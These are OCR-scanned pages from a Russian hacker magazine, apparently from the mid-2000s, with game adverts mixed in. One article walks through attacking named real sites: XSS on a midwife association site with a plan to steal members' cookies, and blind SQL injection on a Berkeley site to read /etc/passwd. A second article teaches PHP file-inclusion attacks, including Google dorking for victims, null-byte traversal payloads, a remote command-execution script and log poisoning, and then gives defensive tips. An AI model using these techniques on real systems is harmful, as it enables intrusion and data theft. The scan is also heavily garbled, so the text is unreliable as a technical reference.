А точнее, — посмотрим, что еще есть в сообщении 
об ошибке. А там есть ссылка на файл: 


Это наиболее интересный сценарий, так как в нем и 
происходит формирование страницы. Но доступ к не- 
му из строки URL запрещен, и при попытке обратить- 
сякнему вываливается сообщение с просьбой ввес- 
ти пароль админа. Посмотрим, на какие еще файлы 
ругается сценарий. Следующим в списке идет: 


Попробуем банально загрузить его: http://www.mid- 
wife.org/header.cfm. В ответ видим ошибку, в которой 
отображается даже код сценария, сработавший не- 
верно. Самое интересное в этом коде — следующая 
строка: 


Проблема явно кроется в том, что в URL нет пара- 
метра id. Попробуем ero туда внедрить и загрузим 
страничку таким образом: http://www.midwife.org/hea- 
der.cfm?id=75. В ответ загрузилась шапка сайта, но вни- 
зу снова сообщение об ошибке и жирным цветом 
выделена строка: 


На этот раз проблема в том, что переменная 
subHeader не имеет значения. Попробуем задать ей 
значение через URL, то есть добавим в URL следу- 
ющий текст: 


Все сработало. Ребенок родился красивым и здоро- 
вым, а посреди страницы красуется надпись «Hello 
from Horrific». Именно этот текст передался через 
URL-napamertp в переменную subHeader. 

Получается, что мы можем инжектировать 
в страницу любой НТМЕ-код, в том числе и Java- 
Script, а это уже пахнет атакой Х$$. Если попы- 
таться загрузить следующий URL, то на странице 
с помощью JavaScript отобразится окно с подоб- 
ным сообщением: 


13 


Так как на сайте есть регистрация и целый раздел 
member, остается только: 


1 ВЫЯСНИТЬ E-MAIL АДРЕСА ЗАРЕГИСТ- 
РИРОВАННЫХ ПОЛЬЗОВАТЕЛЕЙ; 


2 ПОДГОТОВИТЬ URL, КОТОРЫЙ БУДЕТ 
ЗАГРУЖАТЬ СТРАНИЦУ С JAVASCRIPT 
И ОТПРАВЛЯТЬ COOKIE НА ЗАРАНЕЕ 
ПОДГОТОВЛЕННЫЙ СЦЕНАРИЙ. 


Одним словом, классический Х$$. Роды прошли 
удачно. Сообщим нянькам и акушеркам, что их web- 
программист родился с дефектом мозга :). 

> — учим Berkeley жизни. Следующей жертвой ис- 
следований стал знаменитый институт Berkeley. 
Покажем американцам жестокую действитель- 
ность! Итак, заходим на сайт http://cshe.berkeley.edu/ 
и смотрим, что тут есть. Во-первых, сразу бросают- 
ся в глаза публикации статей. Почему бросаются? 
Да потому что они выбираются по параметру $, ко- 
торый передается через ип. Проверим этот пара- 
метр на вшивость. 

Для начала попробуем добавить в его конец 
одинарную кавычку. В результате грузится страни- 
ца, на которой сообщают, что нет публикации для 
отображения. Уже неплохо. А если добавить «and 
1=1»? Тогда публикация вернется на родину. Все яс- 
но, диагноз — SQL Injection в скрытом виде. То есть 
ошибка есть, но сообщения об ошибке нет. Ну, ниче- 
го, это не сильно усложнит задачу. 

Ничего нового не придумываем, а просто под- 
бираем количество полей, возвращаемых запро- 
сом в сценарии. Это делается путем добавления 
в конец параметра объединения Select и постепен- 
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Содержимое файла /etc/passwd собственной персоной 


ного увеличения количества полей до тех пор, по- 
ка страница снова не отобразится корректно. Полу- 
чилось четыре поля, и следующий URL отобразил- 
ся корректно: 


Теперь делаем так, чтобы запрос, прописанный 
в сценарии, ничего не вернул. Для этого в URL, при- 
веденном выше, условие «1=1» заменяем на «1=0». 
Теперь исчезнет статья CID равным 1, а появится то, 
что возвращает внедренный запрос. А внедренный 
запрос возвращает четыре поля со значениями от 1 
до 4. Это сделано специально, чтобы проще было 
найти, куда на странице попадают эти поля. Числа 1 
не оказалось в форме. Видимо, это идентификатор, 
который не отображается. А BOT числа OT 2 до 3 отоб- 
ражаются, и, значит, в любую из этих позиций мож- 
но внедрять имена полей или другие функции. 
Попробуем выяснить версию, имя пользова- 
теля и имя базы данных. Для этого можно вместо 
последней четверки в URL последовательно пос- 
тавить имена функций VERSION(), USER() и DATA- 
BASE(). Обломись бабка, мы на пароходе! Ни од- 
на из этих функций ничего не вернула, а в ответ 
браузер грузит страницу с сообщением о том, что 
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ничего нет для отображения. Это действительно 
облом. Сообщений об ошибках нет, и, значит, мы 
не можем точно определить, какая перед нами ба- 
за данных. А что если это не MySQL, и поэтому 
функций нет? 

Проверим, действительно ли перед нами 
MySQL. Попробуем объединенный запрос связать 
с таблицей MySQL.user: 


Запрос проходит успешно, значит, база данных 
MySQL существует и в ней есть таблица user. Поп- 
робуем вывести имя пользователя из этой таблицы. 
Вместо четверки вставляем имя поля изег и снова 
получаем облом. Да что такое?! Может, это все же 
другая база данных, просто для маскировки созда- 
ли базу и таблицу mysql.user? Еще один тест — поп- 
робуем вместо цифр во внедренном запросе поста- 
вить текст. Вот оно — счастье админа: запрос мо- 
жет возвращать только числа, а если поставить 
строку, то результат — полный облом. 

Что же делать? Допустим все же, что перед 
нами самый популярный MySQL. Тогда можно бу- 
дет попробовать передавать текст с помощью 
функции CHAR. Формируем следующую строку: 


Если перевести в удобочитаемый текст, то эти коды 
превращаются в строчку: 


Ставим этот код вместо третьего параметра 
внедренного запроса и наслаждаемся. Наконец- 
то. Заветное слово изег появилось на странице, 
причем с учетом форматирования тега <h1>. По- 
лучается, что таким образом можно внедрять 
и JavaScript-Kog! 

Итак, подведем итог. Мы уже можем инжекти- 
ровать код и даже научились передавать строки 
с помощью функции СНАВ. Мы также можем быть 
практически уверенными, что перед нами самая 
настоящая база данных MySQL. А что это нам дает? 
А то, что есть еще такая функция, как LOAD_FILE, 
которая может загружать любой файл на сервере. 
Попробуем загрузить файл паролей /etc/passwd. Не 
забываем, что строки нужно кодировать, а значит, 
обращение к файлу должно быть: 


В скобочках закодирован путь /etc/passwd. 

Вставляем этот код в URL на место любого из 
трех параметров (кроме первого) и загружаем 
страничку. Перед нами список пользователей 
собственной персоной. Получается, что админам 
еще учиться и учиться. И это знаменитый Беркли?! 

Мы можем просматривать файлы на сервере, 
на которые хватит прав... 
> удачи! И это только самые показательные 
сайты. Данная ошибка, несмотря на свою долгую 
историю, очень распространена и очень опасна, но 
программисты и администраторы по-прежнему до- 
пускают ее! И после этого говорят, что во всем ви- 
новаты хакеры?! Виноваты программеры-пионеры, 
а хакеры только наказывают их за глупость и нев- 
нимательность. 

Всем администраторам приведенных сайтов 
мы разослали сообщение с описанием ошибки... 
Позор на их седые головы! © 


Вот он — внедренный текст, в строке УВЕ выделена 
самая интересная часть запроса 


Описание: 


Age of Empires Ill The Warchiefs - это 
стратегическая игра нового поколения, 
сочетающая высокий уровень реализма, 
сложную физическую модель и современную 
графику. В Age of Empires Ill игрокам 
предоставлена возможность возглавить одно 
из европейских государств и отправиться на 
покорение Нового Света. 


Age of Empires Ш: The Warchiefs Жанр: 


Описание: 


Вы спасли остров Khorinis от сил зла в Gothic 
Ти Gothic 2. Теперь пришло время 
отправиться в царства на материке. 
Вторжение Орков поработило человеческое _ 
королевство. Есть лишь нескольке-свободных 
людей на ледяном" севере ив южной пустыне, 
а так же горстка мятежников, скрывающихся 
в лесах и горах Мидленда. 


Описание: 


В городе кризис и суматоха. Когда обычные 
средства правоохранительных органов не 
подходят, есть группа, которая призвана, 
чтобы скупо выдать правосудию тех, которые 
полагают, что они выше закона. Эта высоко 
ценимая и особо обученная единица — SWAT 
в SWAT 4. Вы — лидер такого подразделения 
в пределах большого города, где опасность 
подчас выглядит непредотвратимой. 


САМАЯ ПОЛНАЯ 


ИНФОРМАЦИЯ ОБ ИГРАХ 


% Огромное количество * Исчерпывающие 
скриншотов описания 


Играй 
просто == 


Тел.: (495) 780-8825 
©) Факс.: (495) 780-8824 
www.gamepost.ru 


Все цены действительны на момент публикации рекламы 
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> — анализ жертвы. С чего же начать новоиспе- 
ченному хакеру, желающему прославиться, захва- 
тить власть во всем мире или просто подзарабо- 
тать? Начать следует с поиска и анализа жертвы. 
Прежде чем пытаться атаковать какой либо 
м/еб-портал нужно собрать информацию, необходи- 
мую и достаточную для его взлома. 

Информацию можно разбить на категории 
по последовательности производимых действий. 


ВЕ-паноптикумъ 


Тонкости удаленного/локального 
РНР-инклюдинга 


НЕСМОТРЯ НА ТО, ЧТО ЭКСПЛОЙТЫ УДАЛЕННОГО ВКЛЮЧЕНИЯ ФАЙЛОВ ЧРЕЗВЫЧАЙНО 
РАСПРОСТРАНЕНЫ, ДОВОЛЬНО ПРОСТЫ ДЛЯ ПРИМЕНЕНИЯ И ОЧЕНЬ ОПАСНЫ, 
МНОЖЕСТВО ПРОГРАММИСТОВ ПО-ПРЕЖНЕМУ СОВЕРШАЮТ ТИПИЧНЫЕ ОШИБКИ ПРИ 
РАЗРАБОТКЕ МЕВ-ПРИЛОЖЕНИЙ, ОСТАВЛЯЯ ЛАЗЕЙКИ ДЛЯ УШЛЫХ ХАКЕРОВ. В ДАННОЙ 
СТАТЬЕ МЫ ПОПЫТАЕМСЯ НЕ ТОЛЬКО ПОКАЗАТЬ, КАК ЗЛОУМЫШЛЕННИКИ ПОЛЬЗУЮТСЯ 
ПРЕИМУЩЕСТВОМ ОШИБОК КОДИНГА С ЦЕЛЬЮ НАРУШЕНИЯ КОНФИДЕНЦИАЛЬНОСТИ 
ИНФОРМАЦИИ, НО И НАУЧИМСЯ ЗАЩИЩАТЬ \М/ЕВ-ПРИЛОЖЕНИЕ 


Андрей Семенюченко 
isemuha @ тай.ги 


Вот они: “ ЕСЛИ СЦЕНАРИИ КЕМ-ТО УЖЕ НАПИСА- 
1 ПРОВЕРКА ТОГО, ИСПОЛЬЗУЕТ ЛИ НЫ, ТО ЕСТЬ ЯВЛЯЮТСЯ ОБЩЕДОСТУП- 
САЙТ-ЖЕРТВА СВОИ СОБСТВЕННЫЕ НЫМИ, ТО ИЩЕМ СУЩЕСТВУЮЩИЙ 
СКРИПТЫ ИЛИ УЖЕ НАПИСАННЫЕ ЭКСПЛОЙТ НА ЦЕЛЕВОЕ ПРИЛОЖЕНИЕ. 
КЕМ-ТО СЦЕНАРИИ. ВЕРОЯТНОСТЬ СУЩЕСТВОВАНИЯ 


ЭКСПЛОЙТА ПОД КАКОЕ ЛИБО ПРИЛО- 
ЖЕНИЕ ПРОПОРЦИОНАЛЬНО ПОПУЛЯР- 
НОСТИ ДАННОГО ПРИЛОЖЕНИЯ; 


—_ В СЛУЧАЕ САМОПИСНЫХ СКРИПТОВ 
НЕОБХОДИМО ПОЛУЧИТЬ ИСХОДНЫЙ 
КОД ЦЕЛЕВОГО ПРИЛОЖЕНИЯ ДЛЯ СА- 
МОСТОЯТЕЛЬНОЙ ПРОВЕРКИ НА НАЛИ- 
ЧИЕ БАГОВ. 


2 РАССМОТРЕНИЕ СЦЕНАРИЕВ, ТРЕБУЮ- 
ЩИХ ВВОД ДАННЫХ ПОЛЬЗОВАТЕЛЯ. 


— ПРОВЕРИТЬ, РАБОТАЕТ ЛИ БРАУЗИНГ 
ДИРЕКТОРИЙ; 


“~ ПРОВЕРИТЬ НА СУЩЕСТВОВАНИЕ 
И ДОСТУПНОСТЬ ОБЩЕПРИНЯТЫЕ 
ФАЙЛЫ И ДИРЕКТОРИИ (/ЕТС, /BIN, /SBIN, 
/ETC/RESOLV.CONF, /ETC/SERVICES, 
/ETC/PASSWD И ТАК ДАЛЕЕ). 


3 ВЫЯСНЕНИЕ ТОГО, КАК СЦЕНАРИИ 
ОБРАБАТЫВАЮТ ВВОДИМЫЕ ДАННЫЕ. 
ЭТО МОЖЕТ БЫТЬ: 


— ЗАПИСЬ В БАЗЫ ДАННЫХ ИЛИ ФАЙЛЫ; 
—` ВЫВОД ДАННЫХ ОБРАТНО ПОЛЬЗОВАТЕЛЮ; 
—` ВЫПОЛНЕНИЕ КОМАНД. 


4 ВЫЯСНЕНИЕ ТОГО, КАК ПРИЛОЖЕНИЯ 
ФИЛЬТРУЮТ ВВОДИМЫЕ ДАННЫЕ. 
ПОПЫТАТЬСЯ ОБОЙТИ ЭТИ ФИЛЬТРЫ. 


5 ИСПОЛЬЗОВАНИЕ УНИВЕРСАЛЬНОГО 
М/ЕВ-ФИЛЬТРА PROXOMITRON ИЛИ ПО- 
ДОБНОЙ УТИЛИТЫ, ПОЗВОЛЯЮЩЕЙ 
ПРОСМАТРИВАТЬ НТТР-ЗАГОЛОВКИ 
СООБЩЕНИЙ. 


6 ИСПОЛЬЗОВАНИЕ GOOGLE ДЛЯ СБОРА 
ИНФОРМАЦИИ. 


Последний пункт можно рассматривать отдельно 
отприведенной классификации, поскольку он по пра- 
ву заслуживает особого внимания. 

> Google как инструмент хакинга. Как известно, 
если нужно что-то найти — google it! Этот принцип 
можно отнести и кпоиску уязвимых меБ-приложений. 

Попробуем ввести в строку поиска Google 
запрос типа: inurl:"index.php?page=". 

Данный запрос дает понять поисковому движ- 
ку, что мы запрашиваем любую страницу, содержа- 
щую строку «index.php?page=» в каком-либо url. Таким 
образом, результатом поиска будут страницы, со- 
держащие искомую строку, вне зависимости от то- 
го, какое значение передается параметру «раде». 

Потенциальные жертвы обнаружены. Теперь 
надо выделить целевые сайты. Хорошей проверкой 
того, является ли \меб-сайт действительно уязвимым, 
будет, например, присвоение значения Www.google.com 
параметру «раде»: www.site.com/index.php?page=www.go- 
ogle.com. В итоге, если вместо данных проверяемого сай- 
та появляется страничка google.com, web-caiiT уязвим. 


> разбор и редактирование исходников web- 
страниц. Иногда бывает полезно просмотреть исход- 
ный код меб-страницы. Обычно это можно сделать 
через контекстное меню «Правый клик (Right 
Click)»— «Mpocmotp исходного кода страницы (View 
Source)» или через меню «Вид (View)» пункта «Ис- 
ходный текст страницы (Зочгсе)». Правда, таким спо- 
собом можно просмотреть только исходные коды 
НТМЕ-страниц. Код меб-приложений, написанных на 
РНР, Perl, ASP и других интерпретируемых языках 
увидеть нельзя, поскольку он выполняется на сторо- 
не сервера, а на страницу выводятся только резуль- 
таты работы сценария. Таким образом, можно лишь 
попытаться найти уязвимость, позволяющую полу- 
чить содержимое того или иного файла. 
Рассмотрим пример того, как можно изме- 
нять параметры элементов ммеБ-страницы. Предпо- 
ложим, мы зашли на страницу, содержащую фор- 
му для ввода имени и пароля пользователя. Отк- 
рыв текст страницы, увидим примерно следующее: 


Как видно, поле, предназначенное для ввода паро- 
лей, имеет свойство «disabled». Но что если мы хо- 
тим поиграть с атрибутами данного поля и понаблю- 
дать за реакцией сценария на изменение значений 
данных атрибутов? Для этого нужно сохранить 
страницу для доступа в оффлайне, затем открыть 
ее в любимом редакторе и установить нужные зна- 
чения атрибутов. Необходимо также заменить все 
относительные пути в коде страницы на абсолют- 
ные, иначе сценарий для обработки запросов 
index.php не будет найден. В результате мы полу- 
чим примерно следующий код: 


MilwOrm.com — самый большой кладезь эксплойтов 


Теперь осталось лишь сохранить страницу, запол- 
нить данные формы, отправить их серверу и ждать 
ответа. По реакции сервера на запросы можно уз- 
нать много интересного о работе целевого web-npu- 
ложения :). Даже возвращаемые сообщения об 
ошибках могут содержать действительно полезные 
сведения, такие как пути и названия сценариев. 

> = сильные и слабые стороны РНР. \\/еБ-прило- 
жения могут быть написаны на различных языках 
программирования. Наиболее популярными языка- 
ми являются .ASP (Active Server Pages), .РНР (РНР 
Hypertext Preprocessor) и .PL (Perl). Мы сфокусиру- 
ем свое внимание Ha РНР-базируемых приложени- 
ях ввиду их распространенности и популярности. 

РНР является интерпретируемым языком. 
Популярность РНР объясняется простотой и быст- 
ротой написания приложений для различных це- 
лей. РНР включает тысячи внутренних функций для 
реализации любых возможностей. Поэтому об- 
ласть применения РНР ограничена только твоей 
фантазией. Такой широкий набор инструментария 
является главным активом и, одновременно, боль- 
шой слабостью РНР ввиду того, что неаккуратное 
использование некоторых функций приводит к не- 
желательным эффектам. 

Эксплуатирование нашумевших ВЕ--эксплойтов 
возможно благодаря наличию в РНР четырех функ- 
ций: include(), include_once(), require(), require_once(). 
Все они включают код сторонних сценариев и выпол- 
няют его, но каждая функция имеет свои нюансы. 

> include()/require(). Функция include() считывает 
заданный файл и интерпретирует его содержимое 


ОПИСАНИЕ РАССМОТРЕННЫХ В СТАТЬЕ ФУНКЦИЙ 
В РУССКОЯЗЫЧНОМ ВАРИАНТЕ ТЫ МОЖЕШЬ БЕЗ ТРУДА НАЙТИ 


НА САЙТЕ HTTP://RU.PHP.NET 
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Просмотр исходного кода страницы 


как РНР-код. Действия функций include() и require() 
идентичны за исключением того, как они обрабаты- 
вают ошибки. В случае неудачи include() возвраща- 
ет предупреждение (Warning), в то время как ре- 
зультатом require() в этом случае будет возвраще- 
ние фатальной ошибки (Fatal Error). Таким образом, 
при необходимости прервать обработку страницы 
в случае невозможности включить искомый файл, 
нужно пользоваться функцией require(). При исполь- 
зовании include() в случае ошибки сценарий про- 
должит выполнение. 

Конфигурационная директива include_path 
указывает список директорий, в которых функ- 
ции require() и include() ищут файлы. Формат со- 
ответствует формату переменной окружения 
РАТН используемой системы: список директо- 
рий, разделенных двоеточием в Unix или точкой 
с запятой в Windows. 


Сперва система ищет файлы в пути include_path отно- 
сительно текущей директории, а затем — B include_pa- 
th относительно директории текущего скрипта. Напри- 
мер, если include_path имеет значение «.», текущая 
рабочая директория /www/, рабочий сценарий inclu- 
de/a.php, и в этом сценарии мы осуществляем вклю- 
yeune include «sample2.php», то система будет искать 
sample2.php сначала в /www/, а затем в /wwwiinclude/. 
Если имя файла начинается с ./или ../, OH ищется толь- 
ко в include_path относительно текущей директории. 


Когда происходит включение файла, код, со- 
держащийся в этом файле, наследует переменные, 
предопределенные до строки, на которой происхо- 
дит включение. Любые переменные, доступные 
в этой строке в вызывающем файле, будут доступ- 
ны внутри вызываемого файла. Отметим, что все 
функции и классы, определенные во включенном 
файле, имеют глобальную область видимости. 
> include_once()/require_once(). Include_once() 
включает и выполняет указанный файл во время 
выполнения скрипта. Данное поведение напомина- 
ет описанное ранее поведение функции include(), 
с единственным отличием, заключающимся в сле- 
дующем условии: если код файла уже был включен, 
он не будет включен снова. Таким образом, код 
включаемого файла выполнится лишь раз. Отличие 
require_once() от include_once() аналогично отличию 
функций include() и require(). Данными функциями 
следует пользоваться, чтобы избежать проблем, 
связанных с переопределением функций и переназ- 
начением значений переменных. 
> — register_globals. Каждый пользователь, инте- 
ресующийся эксплойтами и посещающий багтрак, 
хотя бы раз видел фразу: «Эксплуатирование уяз- 
вимости требует включения опции register_globals 
в конфигурационном файле РНР». Давай разбе- 
ремся, что это за опция и счем ее едят.Рассмотрим 
пример, состоящий изтрех файлов: 


файл sample1.php: 


8 


ain sample2.php: 


файл sample3.php: 


Как видно, файл sample1.php включает sample2.php, 
а файл sample2.php включает sample3.php. 

Файл sample1.php устанавливает переменную 
$var1 до вызова sample2.php. Затем в sample2.php 
включается файл вне зависимости от того, какое 


ПОВЕДЕНИЕ МНОГИХ ФУНКЦИЙ ЗАВИСИТ ОТ НАСТРОЕК В PHP.INI, 
ПОЭТОМУ ТЩАТЕЛЬНО ПРОВЕРЯЙ ЭТОТ ФАЙЛ ПЕРЕД 
ИСПОЛЬЗОВАНИЕМ КАКОЙ-ЛИБО НОВОЙ ФУНКЦИИ 


значение имеет $\уаг1. Проблема данного кода 
в следующем: он не учитывает, что кто-то может по- 
лучить доступ напрямую к Sample2.php. 

Проблема проявит себя, если в конфигураци- 
онном файле РНР включена директива register_glo- 
bals. Включение данной директивы означает, что лю- 
бая переменная может быть установлена через зап- 
рос пользователя. Переменная $\уаг1 установлена 
до использования в Sample2.php, но если кто-то по- 
лучит доступ в sample2.php первым (до sample1.php), 
и свойство register_globals будет включено, то значе- 
ние переменной $\уаг1 может быть изменено через 
пользовательский запрос. 

К примеру, если меб-приложение доступно по 
ссылке www.vul_site.com/sample1.php, все, что нам нужно 
сделать, — это перейти по адресу www.vul_site.com/sam- 
ple2.php и, в зависимости от настроек в php.ini, мы, ско- 
рее всего, получим страницу с ошибкой, которая подс- 
кажет нам, что Sample2.php ожидает некоторое значе- 
ние для переменной $var1. А поскольку свойство regis- 
ter_globals включено, пользователь самостоятельно 
может инициализировать значение данной перемен- 
ной через соответствующий запрос: www.vul_site.com/- 
sample2.php?var1=any_file_name. Сценарий попытается 
подключить соответствующий искомый файл, в слу- 
чае неудачи будет выдано сообщение об ошибке. 
> magic_quotes_gpc. Итак, попытаемся извлечь 
пользу и подключить вместо валидного сценария, 
например, файл, содержащий хэши паролей поль- 
зователей /etc/passwd: 


Но в результате мы получим ошибку. Подключение 
файла не произойдет потому, что сценарий sam- 
ple2.php дописывает в конце любого файла расшире- 
ние «.php» и пытается получить доступ к ../../../../../../- 
./etc/passwd.php, которого, естественно, не сущест- 
вует. Соответственно, если в своих «учебных» целях 
мы хотим использовать что-либо помимо РНР-сцена- 
риев, нужно избежать добавления окончания «.php». 
Решение проблемы лежит в файле php.ini и называ- 
ется magic_quotes_gpc. Magic_quotes_gpc — это свой- 
ство, действия которого эквивалентны действию 
функции addslashes(). Данная функция возвращает 
сроку, в которой перед каждым спецсимволом (',"\ и 
NUL (байт NULL)) добавлен обратный слеш (\). Аббре- 
виатура GPC расшифровывается как Get, Post, Co- 
okie. Это значит, что по сути magic_quotes_gpc приме- 
няет функцию addslashes() ко всем вашим GET-, 
POST-, иСООКЕ-данным. 

Таким образом, если свойство magic_quo- 
{ез_дрсустановлено в «ой», значит, существует BO3- 
можность включения локальных файлов с нулевым 
байтом в конце имени файла. В РНР нулевой символ 
обозначается как «\п», что эквивалентно шестнадца- 
теричному значению «%00». 

Таким образом, следующий запрос способен 
предоставить интересующий нас файл /etc/passwd: 
www.vul_site.com/sample2.php?varl=../.,/../../../../../etc/passwd%00 


Отметим, что символы «../» aka «dot dot slash» явля- 
ются спецификаторами обхода директорий (Directory 
Traversal Specifiers) и служат для доступа к файлам 
вне текущей директории. Так же можно включать 
удаленные файлы, содержащие злонамеренный код. 
Предположим, мы хотим включить удален- 
ный файл evilscript.php следующего содержания: 


Команда passthru() в РНР выполняет указанные ко- 
манды на сервере. Переменная $_СЕТ ждет указания 
команды и ее параметров в запросе пользователя. 

В результате мы можем получить файл с па- 
ролями пользователей уже другим способом, ис- 
пользуя удаленный сценарий е\Изспру.рНр и явно 
указав нужную команду в строке запроса: 


$ 


инжектирование сценария в лог-файлы. Иног- 
да возникает ситуация, когда администратор сайта 
с помощью некоторых настроек запрещает подклю- 
чать удаленные файлы. Например, установка опции 
allow_url_fopen в значение «off» запретит включать 
сценарии с удаленных ресурсов. Тем не менее, да- 
же в этой ситуации остается возможность инжекти- 
ровать собственный РНР-код в журнал регистрации 
событий. Для этого нужно составить НТТР-СЕТ- 
запрос, содержащий в себе РНР-код, который необ- 
ХОДИМО ВЫПОЛНИТЬ. 


В результате РНР-код будет передан серверу через 
представленный запрос. Сервер зарегистрирует по- 
пытку доступа в своих логах. Это значит, что в фай- 
лах регистрации событий останется и наш РНР-код. 
После этого остается только получить доступ к жур- 
налам через локальное включение файлов. Выпол- 
нение лог-файла при включении ничем не отличает- 
ся отвыполнения РНР-сценария: лишний мусор будет 
отброшен, а функции РНР — выполнены. Передан- 
ные команды будут выполнены без необходимости 
включения удаленного файла. Для выполнения дан- 
ного эксплойта необходимо включение опции regis- 
ter_globals и выключение опции magic_quotes_gpc. 

> — уязвимость в Horde Kronolith. На момент напи- 
сания данной статьи одной из последних на iDefence 
Labs была новость об уязвимости в мер-календаре 


Horde Kronolith, позволяющей включить и выполнить 
произвольный локальный файл. В опубликованной 
новости рассматривается проблемный участок кода, 
но не приводится пример эксплуатирования уязви- 
мости. Давай проанализируем, насколько легко зло- 
умышленник может составить эксплойт, имея перед 
глазами проблемный участок кода. 

На сайте приводился следующий участок 
проблемного кода сценария ‘lib/FBView.php': 


Как видно, уязвимость обнаружена в функции 
Kronolith_FreeBusy_View::factory, которая включает 
локальные файлы, переданные через 'Мем НТТР- 
СЕТ-параметр запроса. В строке 179 с помощью 
функции Базепате( пд path [, string зи х]) осущес- 
твлена проверка вводимых данных. Данная функция 
возвращает имя файла, чей путь передается в каче- 
стве параметра. Если имя файла оканчивается на 
suffix, он также будет отброшен. Таким образом, ис- 
пользуя функцию basename(), разработчики позабо- 
тились об обрезании возможных злонамеренных 
символов, содержащихся в переменной $\е\м. Одна- 


добрый инспектор 


В СТАТЬЕ МЫ РАССМОТРЕЛИ 
ВОЗМОЖНОСТЬ МОДИФИКАЦИИ 
ИСХОДНЫХ ТЕКСТОВ СТРАНИЦЫ 

ПУТЕМ СОХРАНЕНИЯ ТЕКСТОВ И ИХ 
ИЗМЕНЕНИЯ В ОФФЛАЙНЕ. 

ПРИ ИСПОЛЬЗОВАНИИ ПРОДВИНУТЫХ 
М/ЕВ-БРАУЗЕРОВ, ТАКИХ КАК FIREFOX, 
СУЩЕСТВУЕТ БОЛЕЕ ПРОСТОЙ МЕТОД 
РЕШЕНИЯ ДАННОЙ ПРОБЛЕМЫ. ИМЯ ЕМУ 
DOM INSPECTOR (ТООЕ$-\МЕВ DEVELOP- 
MENT~DOM INSPECTOR). 


ПРИ ИСПОЛЬЗОВАНИИ DOM- 
ИНСПЕКТОРА, ВСЕ, ЧТО НАМ НУЖНО, — 
ЭТО ОТКРЫТЬ ПОДОПЫТНУЮ СТРАНИЦУ. 
В РЕЗУЛЬТАТЕ ВНИЗУ ОКНА БРАУЗЕРА 
РОМ-ИНСПЕКТОРА РАСКРОЕТСЯ 
СТРАНИЦА. 


СЛЕВА ВВЕРХУ ОКНА DOM-VHCNEKTOPA 
ПОЯВИТСЯ СТРУКТУРА ИССЛЕДУЕМОЙ 
СТРАНИЦЫ. НАЖИМАЯ НА КНОПКУ 

СО СТРЕЛКОЙ-УКАЗАТЕЛЕМ СЛЕВА 

НА ПАНЕЛИ ИНСТРУМЕНТОВ DOM- 
ИНСПЕКТОРА И КЛИКАЯ ПО 
ИНТЕРЕСУЮЩЕМУ НАС ЭЛЕМЕНТУ 
ИССЛЕДУЕМОЙ СТРАНИЦЫ, МОЖНО 
ЛЕГКО ПЕРЕДВИГАТЬСЯ И ИЗМЕНЯТЬ 
НУЖНЫЕ ТЕГИ И ИХ АТРИБУТЫ. 
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Инспектор DOM 


ко в строке 180 не используется результирующая пе- 
ременная $driver. По невнимательности разработчик 
по-прежнему использует переменную $view при подк- 
лючении файла. Используя символы обхода директо- 
pun (../) инулевые байты (%00), атакующий может по- 
лучить доступ к локальным файлам web-cepsBepa. 

В результате, для отображения все того же 
файла паролей, находящегося в файле /etc/passwd, 
через переменную $view нужно выполнить запрос: 


Получается, что даже без явного эксплойта злоумыш- 
леннику не составляет труда разработать собствен- 
ный вариант нападения по приводимым данным про- 
изводителей или аналитиков безопасности о проб- 
лемных участках кода в программном обеспечении. 

> — защита ме-приложения. Итак, сейчас мы уже 
знаем, как устроены ЕЕ|!-/ВЕ!-эксплойты и какие 
ошибки программистов они используют. Теперь 
нужно понять, как не дать удаленному злоумышлен- 


РНР-инклюдинг в Horde Kronolith 


driers nya жи 


нику осуществить РНР-инклюдинг сценариев. 

Самым простым примером, исключающим 
любую возможность инжектирования злонамерен- 
Horo кода через URL, является отказ от использо- 
вания переменной для хранения имени сценария. 
Вместо этого имя сценария нужно указывать явно. 

Рассмотрим пример: Пусть включение файла про- 
исходит следующим образом: require($page . «other- 
page.php»);. Мы уже знаем, что данный код потенци- 
ально уязвим. Устраним уязвимость, явно указав сце- 
нарий: require(«otherpage.php»);. Таким образом, 
в строке запроса вместо строки index.php?pa- 
ge=otherpage.php мы получим совершенно безобид- 
ную строку, устраняющую возможность включения 
стороннего сценария: index.php?otherpage.php. 

Но что если использование переменной жиз- 
ненно необходимо для нашей программы? Чтобы 
быть уверенным, что никто не допишет в перемен- 
ную злонамеренный код, необходимо избавиться от 
всех лишних символов в строке запроса, включая 
символ перевода строки «\п», символ пробела « », 
символ табуляции «\t», символ возврата каретки «\г» 
и другие. Решить проблему поможет функция спор) 
(или ее псевдоним rtrim()), которая возвращает стро- 
ку с удаленными спецсимволами с конца строки. 


пример использования chop(): 


Следует также учитывать, что в общем случае дан- 
ные в базу будут вводиться непроверенными пользо- 
вателями. И сразу после извлечения из базы — ис- 


пользоваться для генерации Нёт|-страниц, например, 
страницы гостевой книги. Для исключения потенци- 
альной опасности использования тегов и команд 
JavaScript необходимо преобразовать хранимые 
данные с помощью функции PHP htmlispecialchars(). 

Также стоит запретить в РНР использование 
опасных функций, наподобие рассмотренной ранее 
passthru(), которая исполняет переданные ей коман- 
ды с привилегиями запущенного web-cepBepa. Не 
забудем и про некоторые особенно критические оп- 
ции в php.ini. По возможности, нужно выключить ди- 
рективы register_globals и allow_url_fopen и вклю- 
чить директиву magic_quotes_gpc. Конечно, необхо- 
димо учитывать, что кто-то может использовать 
данную функциональность и в легитимных целях. 
> = совет в дорогу. Программируя, необходимо 
помнить, что неаккуратное использование функций 
require(), include() и им подобных может привести не 
только к интерпретированию РНР-кода на стороне 
сервера, но и ко многим другим атакам. Например, 
если файл, который должен быть включен, не суще- 
ствует, удаленный злоумышленник может провести 
Х$$-нападение и выполнить Чауаспр!-код в брау- 
зере пользователя-жертвы. Также отсутствие вклю- 
чаемого файла может повлечь за собой раскрытие 
конфиденциальной информации, полезной для ха- 
кера, через получение сообщения об ошибке. Пос- 
кольку синтаксис сообщения об ошибке для функ- 
ции include() содержит вывод названия параметра 
и путь к сценарию: 


то следующий код: 


В случае невозможности обнаружить искомый файл, 
выдаст сообщение об ошибке, демонстрирующее ха- 
керу целевой параметр и имя сценария: 


На этом наше повествование подходит к концу. Же- 
лаем удачи на ниве П-безопасности. © 


ры 


ИМПАДЫ 
6 Tei МАНИПУЛЯТОРОВ 


Тесты 


> Лучшие геймпады 

- Материнские платы на платформе АМ2 
Акустика 2.1 для дома 

> Производительные кулеры 

> Мыши для игроманов 

> Широкоформатные мониторы 


+ Мегзиз-тест: GeForce 8800 
+ Тест софта: пакеты для комплексного 
тестирования производительности 


тесты © 


НО- МАНЬЯКОВ 


с помощь и советы 


МА AMZ 
НЫЕ СИСТЕМНЫЕ ПЛАТЫ 


Инфо 


> Эволюция человеко-машинных 
интерфейсов 

